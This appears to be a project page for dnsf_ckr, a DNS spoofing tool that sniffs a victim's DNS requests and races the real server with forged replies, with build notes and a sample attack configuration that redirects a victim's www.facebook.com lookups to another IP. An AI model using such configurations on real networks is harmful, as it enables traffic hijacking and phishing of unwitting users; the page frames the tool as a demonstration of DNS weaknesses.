dnsf_ckr is an application used for messing up with domain names. Until now it works on FreeBSD and Linux.
The idea here is sniffing victim’s dns requests and fake the response as soon as possible than real dns server. In this way we can redirect the target machine to anywhere You want.
Warning:
This application is only for educational purposes. Developer wrote it to show how the DNS protocol can be unsecure in some cases and I think you should use it with responsibility.
How to build it?
In order to build dnsf_ckr you need to use Hefesto(https://github.com/rafael-santiago/hefesto), Is a multiplatform build system which currently runs on Linux, FreeBSD and Windows.
Using dnsf_ckr:
* The victim's ip address * The victim's real DNS server IP * What domain names you wish to spoof
# dnsf_ckr attack config sample
# at first, you have to declare your victim alias
victims =
sheep: 192.30.70.9
;
# sheep requests name resolutions in 192.30.70.200 (from now on called "cheap-server")
dns-servers =
cheap-server: 192.30.70.200
;
# and so, the domain that your victim accesses and which you want to spoof, in form <domain>:<spoofed-ip>
namelist boring-sites =
www.facebook.com: 192.30.70.101
;
# finally, you inform your intentions to dnsf_ckr
fake-nameserver =
with sheep mess up boring-sites
;
# but yet we need to describe how valid transactions (in normal conditions, e.g. not spoofed) should be occur.
real-dns-transactions =
sheep sends requests to cheap-server
;What about the dnsf_ckr-core section in .conf file?
A dns exploitation tool
Download : Master.zip | Clone Url
Source : https://github.com/rafael-santiago